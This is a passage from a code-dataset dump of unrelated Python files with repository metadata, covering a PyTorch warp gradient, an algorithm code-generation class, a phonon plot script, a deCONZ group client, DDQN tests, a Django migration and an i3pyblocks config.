    def backward(grad_output, im0, flow, interpolation_mode):
        """Return ``(im0_grad, flow_grad)`` for the warp in ``forward``."""
        B = grad_output.shape[0]
        C = grad_output.shape[1]
        H = grad_output.shape[2]
        W = grad_output.shape[3]
        im0_grad = torch.zeros_like(grad_output)
        # Fixed: was torch.empty([B, H, W, 2]), which returned uninitialized
        # garbage for out-of-bounds pixels and, in nearest mode, for the
        # whole tensor (nearest warping has zero gradient w.r.t. the flow).
        # zeros_like also keeps dtype/device consistent with the flow.
        flow_grad = torch.zeros_like(flow)
        if interpolation_mode == 0:
            for b in range(B):
                for h in range(H):
                    for w in range(W):
                        x = w + flow[b, h, w, 0]
                        y = h + flow[b, h, w, 1]
                        x_f = int(torch.floor(x))
                        y_f = int(torch.floor(y))
                        x_c = x_f+1
                        y_c = y_f+1
                        nw = (x_f, y_f)
                        ne = (x_c, y_f)
                        sw = (x_f, y_c)
                        se = (x_c, y_c)
                        p = im0[b, :, h, w]
                        if nw[0] >= 0 and se[0] < W and nw[1] >= 0 and se[1] < H:
                            # Image gradient: each target pixel's gradient
                            # flows back weighted by its splat coefficient.
                            nw_k = (se[0]-x)*(se[1]-y)
                            ne_k = (x-sw[0])*(sw[1]-y)
                            sw_k = (ne[0]-x)*(y-ne[1])
                            se_k = (x-nw[0])*(y-nw[1])
                            nw_grad = grad_output[b, :, nw[1], nw[0]]
                            ne_grad = grad_output[b, :, ne[1], ne[0]]
                            sw_grad = grad_output[b, :, sw[1], sw[0]]
                            se_grad = grad_output[b, :, se[1], se[0]]
                            im0_grad[b, :, h, w] += nw_k*nw_grad
                            im0_grad[b, :, h, w] += ne_k*ne_grad
                            im0_grad[b, :, h, w] += sw_k*sw_grad
                            im0_grad[b, :, h, w] += se_k*se_grad
                            # Flow gradient: derivatives of the four splat
                            # weights w.r.t. x and y, summed over channels.
                            flow_grad_x = torch.zeros(C)
                            flow_grad_y = torch.zeros(C)
                            flow_grad_x -= (y_c-y)*p*nw_grad
                            flow_grad_y -= (x_c-x)*p*nw_grad
                            flow_grad_x += (y_c-y)*p*ne_grad
                            flow_grad_y -= (x-x_f)*p*ne_grad
                            flow_grad_x -= (y-y_f)*p*sw_grad
                            flow_grad_y += (x_c-x)*p*sw_grad
                            flow_grad_x += (y-y_f)*p*se_grad
                            flow_grad_y += (x-x_f)*p*se_grad
                            flow_grad[b, h, w, 0] = torch.sum(flow_grad_x)
                            flow_grad[b, h, w, 1] = torch.sum(flow_grad_y)
        else:
            # Nearest mode: gradients pass straight through the mapping;
            # flow gradient stays zero.
            round_flow = torch.round(flow)
            for b in range(B):
                for h in range(H):
                    for w in range(W):
                        x = w + int(round_flow[b, h, w, 0])
                        y = h + int(round_flow[b, h, w, 1])
                        if x >= 0 and x < W and y >= 0 and y < H:
                            im0_grad[b, :, h, w] = grad_output[b, :, y, x]
        return im0_grad, flow_grad
33aa02868cbd8dfb15a12fdd973d56d5d7e99fb1 | 10,890 | py | Python | slingen/src/algogen/Algorithm.py | danielesgit/slingen | e7cfee7f6f2347b57eb61a077746c9309a85411c | [
"BSD-3-Clause"
] | 23 | 2018-03-13T07:52:26.000Z | 2022-03-24T02:32:00.000Z | SRC/Algorithm.py | dfabregat/Cl1ck | d9ae627f0616dc23b1f98ff41ce94f43926bb2b0 | [
"BSD-3-Clause"
] | 2 | 2018-09-28T18:29:25.000Z | 2019-02-20T13:22:19.000Z | SRC/Algorithm.py | dfabregat/Cl1ck | d9ae627f0616dc23b1f98ff41ce94f43926bb2b0 | [
"BSD-3-Clause"
] | 3 | 2018-06-13T13:51:57.000Z | 2020-01-11T14:47:02.000Z | import itertools
import Partitioning
class Algorithm( object ):
    """One loop-based algorithm derived from a loop invariant (a PME variant).

    Stores the raw algorithm pieces produced during derivation (init,
    repartitionings, updates, ...) and, after prepare_for_code_generation(),
    the quadrant/size/guard metadata consumed by the code generators.
    """
    def __init__( self, linv, variant, init, repart, contwith, before, after, updates ):
        self.linv = linv
        self.variant = variant
        if init:
            #assert( len(init) == 1 )
            self.init = init[0]
        else:
            self.init = None
        self.repart = repart
        self.contwith = contwith
        self.before = before
        self.after = after
        self.updates = updates
        # To be filled up for code generation
        self.name = None
        self.partition = None
        self.partition_size = None
        self.guard = None
        self.repartition = None
        self.repartition_size = None
        self.basic_repart = None
        self.cont_with = None
    def prepare_for_code_generation( self ):
        """Populate every code-generation metadata attribute."""
        self.set_name()
        self.set_partition()
        self.set_partition_size()
        self.set_guard()
        self.set_repartition()
        self.set_repartition_size()
        self.set_basic_repart()
        self.set_cont_with()
    def set_name( self ):
        """Name the routine after the operation and the variant number."""
        self.name = "%s_blk_var%d" % (self.linv.operation.name, self.variant)
    def set_partition( self ):
        """Record per operand its partitioning: (shape, flattened quadrants,
        and the initial quadrant label implied by the traversal direction)."""
        self.partition = dict()
        traversals = self.linv.traversals[0][0]
        #for op in self.linv.operation.operands: # [FIX] linv_operands?
        for op in self.linv.linv_operands: # [FIX] linv_operands?
            #part_size = self.linv.pme.part_shape[ op.get_name() ]
            part_size = self.linv.linv_operands_part_shape[ op.get_name() ]
            #part_flat = list(itertools.chain( *self.linv.pme.partitionings[ op.get_name() ] ))
            part_flat = list(itertools.chain( *self.linv.linv_operands_basic_part[ op.get_name() ] ))
            trav = traversals[op.get_name()]
            if part_size == (1, 1):
                continue
            elif part_size == (1, 2):
                if trav == (0, 1):
                    part_quad = "L"
                else: # (0, -1)
                    part_quad = "R"
            elif part_size == (2, 1):
                if trav == (1, 0):
                    part_quad = "T"
                else: # (-1, 0)
                    part_quad = "B"
            elif part_size == (2, 2):
                if trav == (1, 1):
                    part_quad = "TL"
                elif trav == (1, -1):
                    part_quad = "TR"
                elif trav == (-1, 1):
                    part_quad = "BL"
                else: #(-1, -1):
                    part_quad = "BR"
            else:
                raise Exception
            self.partition[ op.get_name() ] = (part_size, part_flat, part_quad)
    def set_partition_size( self ):
        """Record the initial size (rows, cols) of the traversed quadrant;
        0 marks the dimension that grows during the loop."""
        self.partition_size = dict()
        traversals = self.linv.traversals[0][0]
        #for op in self.linv.operation.operands:
        for op in self.linv.linv_operands:
            name = op.get_name()
            traversal = traversals[op.get_name()]
            if traversal == (0, 0):
                continue
            elif traversal in ( (0, 1), (0, -1) ): # L|R (the specific quadrant can be retrieved from self.partition)
                self.partition_size[ name ] = ( op.size[0], 0 )
            elif traversal in ( (1, 0), (-1, 0) ): # T/B
                self.partition_size[ name ] = ( 0, op.size[1] )
            elif traversal in ( (1, 1), (1, -1), (-1, 1), (-1, -1) ): # 2x2
                self.partition_size[ name ] = ( 0, 0 )
            else:
                print( name, traversal )
                raise Exception
    def set_guard( self ):
        """Build the loop-guard terms from the operands driving each
        traversed (bound) dimension; only the first relevant operand of
        each dimension group contributes (hence the break)."""
        self.guard = []
        traversals = self.linv.traversals[0][0]
        #guard_dims = [bd[0] for bd in self.linv.linv_bound_dimensions[1:]]
        guard_dims = []
        #for bd in self.linv.linv_bound_dimensions[1:]:
        for bd in self.linv.operation.bound_dimensions[1:]:
            for d in bd:
                op_name, dim = d.split("_")
                op = [ o for o in self.linv.operation.operands if o.name == op_name ][0]
                if op.st_info[1] != op:
                    continue
                if dim == "r":
                    idx = 0
                else:
                    idx = 1
                if ( traversals[op_name][idx] == 0 ):
                    continue
                self.guard.append( (op.get_size()[idx], guard(op, traversals[op_name])) )
                break
    def set_repartition( self ):
        """Record per operand the repartitioning: (repartitioned shape,
        flattened quadrants, and which quadrant is split further)."""
        self.repartition = dict()
        traversals = self.linv.traversals[0][0]
        #for op in self.linv.operation.operands:
        for op in self.linv.linv_operands:
            part_size = self.linv.linv_operands_part_shape[ op.get_name() ]
            #part_size = self.linv.pme.part_shape[ op.get_name() ]
            repart = self.repart[ op.get_name() ]
            traversal = traversals[op.get_name()]
            if part_size == (1, 1):
                continue
            elif part_size == (1, 2):
                repart_size = (1, 3)
                if traversal == (0, 1): # ( 0 || 1 | 2 )
                    repart_quadrant = "R"
                else: # ( 0 | 1 || 2 )
                    repart_quadrant = "L"
            elif part_size == (2, 1):
                repart_size = (3, 1)
                if traversal == (1, 0): # ( 0 // 1 / 2 )
                    repart_quadrant = "B"
                else: # ( 0 / 1 // 2 )
                    repart_quadrant = "T"
            elif part_size == (2, 2):
                repart_size = (3, 3)
                if traversal == (1, 1): # BR becomes 2x2
                    repart_quadrant = "BR"
                elif traversal == (1, -1): # BL becomes 2x2
                    repart_quadrant = "BL"
                elif traversal == (-1, 1): # TR becomes 2x2
                    repart_quadrant = "TR"
                else: #if traversal == (-1, -1): # TL becomes 2x2
                    repart_quadrant = "TL"
            else:
                raise Exception
            repart_flat = list(flatten_repart(repart))
            self.repartition[ op.get_name() ] = (repart_size, repart_flat, repart_quadrant)
    def set_repartition_size( self ):
        """Record the size labels of the quadrant exposed by repartitioning
        ("bs" denotes the symbolic block size)."""
        self.repartition_size = dict()
        traversals = self.linv.traversals[0][0]
        #for op in self.linv.operation.operands:
        for op in self.linv.linv_operands:
            name = op.get_name()
            traversal = traversals[op.get_name()]
            if traversal == (0, 0):
                continue
            elif traversal in ( (0, 1), (0, -1) ): # Quadrant is 1
                self.repartition_size[ name ] = ( "1", op.size[0], "bs" )
            elif traversal in ( (1, 0), (-1, 0) ): # Quadrant is 1
                self.repartition_size[ name ] = ( "1", "bs", op.size[1] )
            elif traversal in ( (1, 1), (1, -1), (-1, 1), (-1, -1) ): # Quadrant is 11
                self.repartition_size[ name ] = ( "11", "bs", "bs" )
            else:
                print( name, traversal )
                raise Exception
    def set_basic_repart( self ):
        """Record the basic (shape-only) repartitioning of every operand."""
        self.basic_repart = dict()
        traversals = self.linv.traversals[0][0]
        for op in self.linv.linv_operands:
            part_size = self.linv.linv_operands_part_shape[ op.get_name() ]
            if part_size == (1, 1):
                repart_size = (1, 1)
            elif part_size == (1, 2):
                repart_size = (1, 3)
            elif part_size == (2, 1):
                repart_size = (3, 1)
            elif part_size == (2, 2):
                repart_size = (3, 3)
            else:
                raise Exception
            self.basic_repart[ op.get_name() ] = Partitioning.repartition_shape( op, repart_size )
    # NOTE(fix): a truncated duplicate definition of set_repartition_size
    # used to live here; being defined later in the class body, it silently
    # replaced the complete implementation above and left
    # self.repartition_size almost empty.  The duplicate has been removed.
    def set_cont_with( self ):
        """Record, per operand, which quadrant absorbs the processed block
        when the partitioning boundaries advance (continue-with step)."""
        self.cont_with = dict()
        traversals = self.linv.traversals[0][0]
        #for op in self.linv.operation.operands:
        for op in self.linv.linv_operands:
            part_size = self.linv.linv_operands_part_shape[ op.get_name() ]
            #part_size = self.linv.pme.part_shape[ op.get_name() ]
            traversal = traversals[op.get_name()]
            if part_size == (1, 1):
                continue
            elif part_size == (1, 2):
                if traversal == (0, 1): # ( 0 | 1 || 2 ) 1 appended to L
                    cont_with_quadrant = "L"
                else: # ( 0 || 1 | 2 ) 1 appended to R
                    cont_with_quadrant = "R"
            elif part_size == (2, 1):
                if traversal == (1, 0): # ( 0 / 1 // 2 ) 1 appended to T
                    cont_with_quadrant = "T"
                else: # ( 0 // 1 / 2 ) 1 appended to B
                    cont_with_quadrant = "B"
            elif part_size == (2, 2):
                if traversal == (1, 1): # TL grows
                    cont_with_quadrant = "TL"
                elif traversal == (1, -1): # TR grows
                    cont_with_quadrant = "TR"
                elif traversal == (-1, 1): # BL grows
                    cont_with_quadrant = "BL"
                else: #if traversal == (-1, -1): # BR grows
                    cont_with_quadrant = "BR"
            else:
                raise Exception
            self.cont_with[ op.get_name() ] = cont_with_quadrant
def guard( op, traversal ):
    """Map a traversal direction onto the quadrant label used in the loop
    guard; returns a (quadrant_label, operand) pair.

    Raises Exception for an unrecognized traversal direction.
    """
    name = op.get_name()  # only used for error reporting below
    if traversal == (0, 1): # L -> R
        return ("L", op)
    elif traversal == (0, -1): # R -> L
        return ("R", op)
    elif traversal == (1, 0): # T -> B
        return ("T", op)
    elif traversal == (-1, 0): # B -> T
        return ("B", op)
    elif traversal == (1, 1): # TL -> BR
        return ("TL", op)
    elif traversal == (1, -1): # TR -> BL
        return ("TR", op)
    elif traversal == (-1, 1): # BL -> TR
        return ("BL", op)
    elif traversal == (-1, -1): # BR -> TL
        return ("BR", op)
    else:
        # Fixed: previously referenced the undefined name ``op_name``,
        # which raised NameError instead of reporting the bad traversal.
        print( name, traversal )
        raise Exception
# Flattens a matrix of matrices resulting from a repartitioning
def flatten_repart( repart ):
    """Yield the quadrants of a repartitioned operand in row-major order.

    ``repart`` is a 2D grid whose cells are themselves 2D node objects
    (each cell is iterable over its rows and exposes ``children``).
    Quadrants are tagged with their absolute (row, col) position, sorted,
    and yielded flattened.
    """
    r, c = 0, 0
    chained = []
    for row in repart:
        for cell in row:
            _r = r
            _c = c
            for _row in cell:
                _c = c
                for _cell in _row:
                    chained.append( (_r, _c, _cell) )
                    _c += 1
                _r += 1
            # Advance the column origin by the width of this cell.
            c += len( cell.children[0] )
        # NOTE(review): the row origin is taken from the last cell of the
        # row and is not accumulated across grid rows -- presumably valid
        # because repartitionings have at most one non-trivial row split;
        # confirm against callers.
        r = len( cell.children )
        c = 0
    # Positions are unique, so the sort orders purely by (row, col).
    chained.sort()
    for _, _, quadrant in chained:
        yield quadrant
| 39.314079 | 118 | 0.485399 | 9,551 | 0.877043 | 507 | 0.046556 | 0 | 0 | 0 | 0 | 1,571 | 0.144261 |
33aa970f90cce46880eed9d5a6bf196cf7546cbc | 939 | py | Python | NbSe2/PBE-0.01/5-epw/epc_plot.py | sinansevim/EBT617E | 0907846e09173b419dfb6c3a5eae20c3ef8548bb | [
"MIT"
] | 1 | 2021-03-12T13:16:39.000Z | 2021-03-12T13:16:39.000Z | NbSe2/PBE-0.01/5-epw/epc_plot.py | sinansevim/EBT617E | 0907846e09173b419dfb6c3a5eae20c3ef8548bb | [
"MIT"
] | null | null | null | NbSe2/PBE-0.01/5-epw/epc_plot.py | sinansevim/EBT617E | 0907846e09173b419dfb6c3a5eae20c3ef8548bb | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
import matplotlib.gridspec as gs
import sys
data = np.loadtxt('NbSe2.freq.gp')
symmetryfile = 'plotband.out'
lbd = np.loadtxt("lambda.dat")
lbd_val = np.where(lbd<1 , lbd, 1)
def Symmetries(fstring):
    """Collect the x positions of the high-symmetry points listed in a
    plotband output file (the last token of every 'high-symmetry' line)."""
    positions = np.zeros(0)
    with open(fstring, 'r') as handle:
        for line in handle:
            if "high-symmetry" in line:
                positions = np.append(positions, float(line.split()[-1]))
    return positions
x=np.tile(data.T[0],9)  # repeat the q-axis once per phonon branch (9 branches)
val = lbd_val.T[1:].reshape(-1)  # per-mode coupling strengths, flattened to match x/y
y=data.T[1:].reshape(-1,)  # all branch frequencies, flattened
fig=plt.figure(figsize=(8,6))
labels=["G","M","K","G"]  # high-symmetry point labels along the q-path
# 0.12398: presumably cm^-1 -> meV conversion (ylabel is meV) -- confirm units of the .freq file
plt.scatter(x,y*0.12398,c=val,cmap="copper",s=10)
sym_tick = Symmetries(symmetryfile)
# Vertical guides at every high-symmetry point except the last (plot edge).
for i in range(len(sym_tick)-1):
    plt.axvline(sym_tick[i],linestyle='dashed', color='black', alpha=0.75)
plt.xticks(sym_tick,labels)
plt.xlim(min(sym_tick),max(sym_tick))
plt.ylim(0)
plt.ylabel("Energy (meV)")
plt.colorbar()
plt.savefig("epc.pdf")
plt.show()
33ac31110619eeecf53e6d049d77405ba061c204 | 341 | py | Python | CA117/Lab_5/numcomps_32.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 6 | 2016-02-04T00:15:20.000Z | 2019-10-13T13:53:16.000Z | CA117/Lab_5/numcomps_32.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 2 | 2016-03-14T04:01:36.000Z | 2019-10-16T12:45:34.000Z | CA117/Lab_5/numcomps_32.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 10 | 2016-02-09T14:38:32.000Z | 2021-05-25T08:16:26.000Z | print(("Multiples of {}: {}\n"*6).format("3",[n for n in range(1,31)if not n%3],"3 squared",[n**2for n in range(1,31)if not n%3],"4 doubled",[n*2for n in range(1,31)if not n%4],"3 or 4",[n for n in range(1,31)if not(n%4and n%3)],"3 and 4",[n for n in range(1,31)if not(n%4or n%3)],"3 replaced",[n%3and n or'X'for n in range(1,31)]).strip())
| 170.5 | 340 | 0.609971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 80 | 0.234604 |
33ac8b55bf9e88be389ec358327a0af6df0dcc61 | 5,594 | py | Python | pydeconz/group.py | Lokaltog/deconz | 88c726c0ed4c320af3caa82f2c2fb60937ea186a | [
"MIT"
] | null | null | null | pydeconz/group.py | Lokaltog/deconz | 88c726c0ed4c320af3caa82f2c2fb60937ea186a | [
"MIT"
] | null | null | null | pydeconz/group.py | Lokaltog/deconz | 88c726c0ed4c320af3caa82f2c2fb60937ea186a | [
"MIT"
] | null | null | null | """Python library to connect deCONZ and Home Assistant to work together."""
import logging
from .light import DeconzLightBase
_LOGGER = logging.getLogger(__name__)
class DeconzGroup(DeconzLightBase):
    """Represent a deCONZ light group.

    Dresden Elektroniks documentation of light groups in deCONZ:
    http://dresden-elektronik.github.io/deconz-rest-doc/groups/
    """

    def __init__(self, device_id, device, async_set_state_callback):
        """Cache the group's attributes and build its scene objects.

        ``async_set_state_callback`` is stored by the base class and used
        later to push state changes back to the deCONZ gateway.
        """
        deconz_id = '/groups/' + device_id
        action = device['action']
        state = device['state']
        self._all_on = state.get('all_on')
        self._any_on = state.get('any_on')
        self._bri = action.get('bri')
        self._class = device.get('class')
        self._colormode = action.get('colormode')
        self._ct = action.get('ct')
        self._devicemembership = device.get('devicemembership')
        self._effect = action.get('effect')
        self._hidden = device.get('hidden')
        self._hue = action.get('hue')
        self._id = device.get('id')
        self._lights = device.get('lights')
        self._lightsequence = device.get('lightsequence')
        self._multideviceids = device.get('multideviceids')
        self._on = action.get('on')
        self._reachable = True
        self._sat = action.get('sat')
        self._scenes = {}
        self._x, self._y = action.get('xy', (None, None))
        super().__init__(deconz_id, device, async_set_state_callback)
        self.async_add_scenes(device.get('scenes'), async_set_state_callback)

    async def async_set_state(self, data):
        """Send a new state to the group's ``action`` endpoint.

        Example payload::

            {
                "on": true,
                "bri": 180,
                "hue": 43680,
                "sat": 255,
                "transitiontime": 10
            }

        The local cache is refreshed as well, because group updates are not
        echoed back over the websocket.
        """
        field = self.deconz_id + '/action'
        await self._async_set_state_callback(field, data)
        self.async_update({'state': data})

    def as_dict(self):
        """Callback for __dict__, with the scene objects stripped out."""
        cdict = super().as_dict()
        cdict.pop('_scenes', None)
        return cdict

    @property
    def state(self):
        """True if any light in the light group is on."""
        return self._any_on

    @property
    def groupclass(self):
        """Category ("class") of the group as reported by deCONZ."""
        return self._class

    @property
    def all_on(self):
        """True if every light in the light group is on."""
        return self._all_on

    @property
    def devicemembership(self):
        """Ids of the devices (sensors) that created this group, if any."""
        return self._devicemembership

    @property
    def hidden(self):
        """Whether apps should hide this group.

        The flag has no effect on the gateway itself.
        """
        return self._hidden

    @property
    def id(self):
        """The id of the group."""
        return self._id

    @property
    def lights(self):
        """All light ids of this group, in gateway-defined order."""
        return self._lights

    @property
    def lightsequence(self):
        """User-sortable subset of this group's light ids."""
        return self._lightsequence

    @property
    def multideviceids(self):
        """Subsequent ids from multidevices with multiple endpoints."""
        return self._multideviceids

    @property
    def scenes(self):
        """Mapping of scene id to DeconzScene for this group."""
        return self._scenes

    def async_add_scenes(self, scenes, async_set_state_callback):
        """Rebuild the scene mapping from *scenes*.

        NOTE(review): as in the original implementation, the mapping is
        replaced with objects for scene ids that were *not* previously
        known; already-known scenes are dropped — confirm this is intended.
        """
        known = self._scenes
        rebuilt = {}
        for scene in scenes:
            if scene['id'] not in known:
                rebuilt[scene['id']] = DeconzScene(
                    self, scene, async_set_state_callback
                )
        self._scenes = rebuilt
class DeconzScene:
    """Represent a deCONZ scene.

    Dresden Elektroniks documentation of scenes in deCONZ:
    http://dresden-elektronik.github.io/deconz-rest-doc/scenes/
    """

    def __init__(self, group, scene, async_set_state_callback):
        """Cache scene attributes and the callback used to recall it."""
        self._group_id = group.id
        self._group_name = group.name
        self._id = scene.get('id')
        self._name = scene.get('name')
        self._deconz_id = group.deconz_id + '/scenes/' + self._id
        self._async_set_state_callback = async_set_state_callback

    async def async_set_state(self, data):
        """Ask the gateway to recall this scene for its group."""
        await self._async_set_state_callback(self._deconz_id + '/recall', data)

    @property
    def deconz_id(self):
        """API path of the scene, e.g. /groups/1/scenes/1."""
        return self._deconz_id

    @property
    def full_name(self):
        """Group name and scene name combined."""
        return ' '.join((self._group_name, self._name))

    @property
    def id(self):
        """Scene ID from deCONZ."""
        return self._id

    @property
    def name(self):
        """Scene name."""
        return self._name

    def as_dict(self):
        """Callback for __dict__, without the state callback."""
        cdict = self.__dict__.copy()
        cdict.pop('_async_set_state_callback', None)
        return cdict
| 29.442105 | 78 | 0.604934 | 5,421 | 0.969074 | 0 | 0 | 1,845 | 0.329818 | 629 | 0.112442 | 2,183 | 0.39024 |
33ad3f8d85b0ae17f8d1f68deb1a77ffc336a163 | 155 | py | Python | nocolon_main.py | paradoxxxzero/nocolon | 80bffe09e200b148cd836fd8289c59f2cd33719b | [
"BSD-3-Clause"
] | 73 | 2015-05-08T09:22:03.000Z | 2021-05-20T15:17:18.000Z | nocolon_main.py | paradoxxxzero/nocolon | 80bffe09e200b148cd836fd8289c59f2cd33719b | [
"BSD-3-Clause"
] | 3 | 2017-05-12T20:57:10.000Z | 2017-05-15T10:10:30.000Z | nocolon_main.py | paradoxxxzero/nocolon | 80bffe09e200b148cd836fd8289c59f2cd33719b | [
"BSD-3-Clause"
] | 5 | 2016-10-21T09:29:39.000Z | 2017-11-15T19:16:29.000Z | # Import the encoding
# Importing nocolon presumably registers the custom "nocolon" source encoding
# with the interpreter so modules written in it can be imported — confirm in
# the nocolon package documentation.
import nocolon
# Now you can import files with the nocolon encoding:
from nocolon_test import nocolon_function

# Demo call into the nocolon-encoded module.
nocolon_function(4)
| 19.375 | 53 | 0.819355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 74 | 0.477419 |
33adb93bec718e8a93becbae4939a6d055886757 | 1,033 | py | Python | yarlp/tests/agent_tests/test_ddqn.py | btaba/yarlp | e6bc70afe32f8617f56180d60d6a100c83868119 | [
"MIT"
] | 12 | 2018-02-26T05:00:24.000Z | 2020-01-07T03:04:47.000Z | yarlp/tests/agent_tests/test_ddqn.py | btaba/yarlp | e6bc70afe32f8617f56180d60d6a100c83868119 | [
"MIT"
] | 6 | 2018-10-23T17:43:57.000Z | 2022-02-10T00:00:24.000Z | yarlp/tests/agent_tests/test_ddqn.py | btaba/yarlp | e6bc70afe32f8617f56180d60d6a100c83868119 | [
"MIT"
] | 1 | 2018-08-20T23:47:41.000Z | 2018-08-20T23:47:41.000Z | """
Regression tests for the REINFORCE agent on OpenAI gym environments
"""
import pytest
import numpy as np
import shutil
from yarlp.utils.env_utils import NormalizedGymEnv
from yarlp.agent.ddqn_agent import DDQNAgent
# Shared module-level environment used by all tests below.
# NOTE(review): the Atari env is built at import time, so test collection
# already pays its construction cost; assumes the Pong ROM is available.
env = NormalizedGymEnv(
    'PongNoFrameskip-v4',
    is_atari=True
)
def test_ddqn():
    """Smoke test: a tiny DDQN training run completes without errors."""
    params = {
        'max_timesteps': 10,
        'learning_start_timestep': 1,
        'train_freq': 5,
        'batch_size': 1,
    }
    DDQNAgent(env, **params).train()
def test_seed():
    """Two runs with the same seed must fill the replay buffer identically."""
    def first_sampled_obs():
        agent = DDQNAgent(env, seed=143, max_timesteps=2)
        agent.train()
        obs, *_ = agent.replay_buffer.sample(1)
        return np.array(obs)

    assert np.all(first_sampled_obs() == first_sampled_obs())
def test_save_models():
    """An agent can be saved to disk, reloaded, and trained further."""
    save_dir = 'testy_ddqn'
    try:
        agent = DDQNAgent(env, max_timesteps=2)
        agent.train()
        agent.save(save_dir)
        agent = DDQNAgent.load(save_dir)
        # Reset the internal step counter so the reloaded agent trains again.
        agent.t = 0
        agent.train()
    finally:
        # Clean up even when a step above fails; the original only removed
        # the directory on success, so a failed run left a stale directory
        # behind that could break the next run's save().
        shutil.rmtree(save_dir, ignore_errors=True)
| 21.978723 | 71 | 0.648596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.130687 |
33aee20a7b69a67ee353d635818abf32c9a23996 | 555 | py | Python | arbeitsplan/migrations/0009_mitglied_arbeitslast.py | hkarl/svpb | 29aab0065ff69c7c4d52812508167514d635cab9 | [
"Apache-2.0"
] | 3 | 2015-02-20T14:53:17.000Z | 2020-12-01T19:29:14.000Z | arbeitsplan/migrations/0009_mitglied_arbeitslast.py | hkarl/svpb | 29aab0065ff69c7c4d52812508167514d635cab9 | [
"Apache-2.0"
] | 67 | 2015-01-06T19:48:59.000Z | 2022-03-20T16:56:22.000Z | arbeitsplan/migrations/0009_mitglied_arbeitslast.py | hkarl/svpb | 29aab0065ff69c7c4d52812508167514d635cab9 | [
"Apache-2.0"
] | 2 | 2015-12-07T09:21:10.000Z | 2015-12-30T18:36:53.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add the per-member yearly work quota field ``arbeitslast`` to Mitglied."""

    dependencies = [
        ('arbeitsplan', '0008_auto_20141208_1906'),
    ]

    operations = [
        migrations.AddField(
            model_name='mitglied',
            name='arbeitslast',
            # help_text (German): "How many hours per year must this member
            # work?"; verbose_name: "work load (h/year)". Default quota: 10 h.
            field=models.IntegerField(default=10, help_text=b'Wieviele Stunden pro Jahr muss dieses Mitglied arbeiten?', verbose_name=b'Arbeitslast (h/Jahr)'),
            preserve_default=True,
        ),
    ]
| 26.428571 | 159 | 0.646847 | 446 | 0.803604 | 0 | 0 | 0 | 0 | 0 | 0 | 166 | 0.299099 |
33aefac32f09c23801a6116bba41fc7dfac6eba4 | 789 | py | Python | fedireads/activitypub/__init__.py | johnbartholomew/bookwyrm | a6593eced7db88f0a68bd19a0e6ba441bf1053c3 | [
"CC0-1.0"
] | null | null | null | fedireads/activitypub/__init__.py | johnbartholomew/bookwyrm | a6593eced7db88f0a68bd19a0e6ba441bf1053c3 | [
"CC0-1.0"
] | null | null | null | fedireads/activitypub/__init__.py | johnbartholomew/bookwyrm | a6593eced7db88f0a68bd19a0e6ba441bf1053c3 | [
"CC0-1.0"
] | null | null | null | ''' bring activitypub functions into the namespace '''
from .actor import get_actor
from .book import get_book, get_author, get_shelf
from .create import get_create, get_update
from .follow import get_following, get_followers
from .follow import get_follow_request, get_unfollow, get_accept, get_reject
from .outbox import get_outbox, get_outbox_page
from .shelve import get_add, get_remove
from .status import get_review, get_review_article
from .status import get_rating, get_rating_note
from .status import get_comment, get_comment_article
from .status import get_quotation, get_quotation_article
from .status import get_status, get_replies, get_replies_page
from .status import get_favorite, get_unfavorite
from .status import get_boost
from .status import get_add_tag, get_remove_tag
| 46.411765 | 76 | 0.844106 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 54 | 0.068441 |
33af08b32aa16f66ff5e4dd78fe22ef1749cfda7 | 645 | py | Python | generated-libraries/python/netapp/ems/eventseverity.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | 2 | 2017-03-28T15:31:26.000Z | 2018-08-16T22:15:18.000Z | generated-libraries/python/netapp/ems/eventseverity.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | generated-libraries/python/netapp/ems/eventseverity.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | class Eventseverity(basestring):
"""
EMERGENCY|ALERT|CRITICAL|ERROR|WARNING|NOTICE|INFORMATIONAL|DEBUG
Possible values:
<ul>
<li> "emergency" - System is unusable,
<li> "alert" - Action must be taken immediately,
<li> "critical" - Critical condition,
<li> "error" - Error condition,
<li> "warning" - Warning condition,
<li> "notice" - Normal but significant condition,
<li> "informational" - Information message,
<li> "debug" - A debugging message
</ul>
"""
@staticmethod
def get_api_name():
return "eventseverity"
| 30.714286 | 69 | 0.587597 | 639 | 0.990698 | 0 | 0 | 70 | 0.108527 | 0 | 0 | 537 | 0.832558 |
33b07a2a4560968ed7e8bf918e25e34e366baaa5 | 8,110 | py | Python | example.py | DesmondTMB/i3pyblocks | 4732340ba45bf6b6b7b5bd3ff3c32af3796e7fa3 | [
"MIT"
] | 15 | 2020-09-19T20:18:34.000Z | 2021-06-12T15:16:02.000Z | example.py | DesmondTMB/i3pyblocks | 4732340ba45bf6b6b7b5bd3ff3c32af3796e7fa3 | [
"MIT"
] | 141 | 2019-08-13T23:38:47.000Z | 2021-11-10T16:20:34.000Z | example.py | DesmondTMB/i3pyblocks | 4732340ba45bf6b6b7b5bd3ff3c32af3796e7fa3 | [
"MIT"
] | 2 | 2021-05-24T17:04:35.000Z | 2021-11-09T00:43:13.000Z | #!/usr/bin/env python3
import asyncio
import logging
import signal
from pathlib import Path
import psutil
from i3pyblocks import Runner, types, utils
from i3pyblocks.blocks import ( # shell,
datetime,
dbus,
http,
i3ipc,
inotify,
ps,
pulse,
x11,
)
# Configure logging, so we can have debug information available in
# ~/.i3pyblocks.log
# Use `logging.INFO` to reduce verbosity
# NOTE(review): DEBUG level can grow this file quickly — confirm whether
# log rotation is handled elsewhere.
